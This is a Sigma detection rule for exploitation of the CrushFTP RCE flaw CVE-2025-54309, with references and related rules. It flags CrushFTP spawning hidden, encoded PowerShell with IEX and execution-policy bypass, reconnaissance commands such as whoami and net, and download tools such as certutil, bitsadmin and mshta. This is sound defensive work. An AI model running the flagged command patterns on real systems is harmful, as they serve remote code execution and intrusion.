Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)

 1title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
 2id: 0fdc7c7f-c690-4217-9ae3-31f5156eed72
 3status: experimental
 4description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309.
 5references:
 6    - https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/
 7    - https://pwn.guide/free/web/crushftp
 8    - https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/
 9author: Nisarg Suthar
10date: 2025-08-01
11tags:
12    - attack.privilege-escalation
13    - attack.initial-access
14    - attack.execution
15    - attack.t1059.001
16    - attack.t1059.003
17    - attack.t1068
18    - attack.t1190
19    - cve.2025-54309
20    - detection.emerging-threats
21logsource:
22    category: process_creation
23    product: windows
24detection:
25    selection_parent:
26        ParentImage|endswith: '\crushftp.exe'
27    selection_child_powershell:
28        Image|endswith:
29            - '\powershell.exe'
30            - '\powershell_ise.exe'
31            - '\pwsh.exe'
32        CommandLine|contains|all:
33            - 'IEX'
34            - 'enc'
35            - 'Hidden'
36            - 'bypass'
37    selection_child_cmd:
38        Image|endswith: '\cmd.exe'
39        CommandLine|contains:
40            - '/c powershell'
41            - 'whoami'
42            - 'net.exe'
43            - 'net1.exe'
44    selection_child_others:
45        Image|endswith:
46            - '\bitsadmin.exe'
47            - '\certutil.exe'
48            - '\mshta.exe'
49            - '\cscript.exe'
50            - '\wscript.exe'
51    condition: selection_parent and 1 of selection_child_*
52falsepositives:
53    - Legitimate administrative command execution
54level: high

References

• First Look at CVE-2025-54309: Dissecting the Latest CrushFTP Exploit

  

  ReliaQuest observed an attempted exploitation of CVE-2025-54309—a zero-day vulnerability in CrushFTP’s file transfer software.

  
  Read More

• CrushFTP RCE Explained

  

  What the new critical CrushFTP vulnerability is & how to exploit it.

  
  Read More

• CrushFTP Vulnerability (CVE-2025-54309): Securing File Transfer Services

  

  CrushFTP servers are under threat from CVE-2025-54309. Learn how this vulnerability works and how to protect your file transfer services.

  
  Read More

Related rules

• Suspicious CrushFTP Child Process
• Exploited CVE-2020-10189 Zoho ManageEngine
• Exploiting SetupComplete.cmd CVE-2019-1378
• Potential SAP NetWeaver Webshell Creation
• Potential SAP NetWeaver Webshell Creation - Linux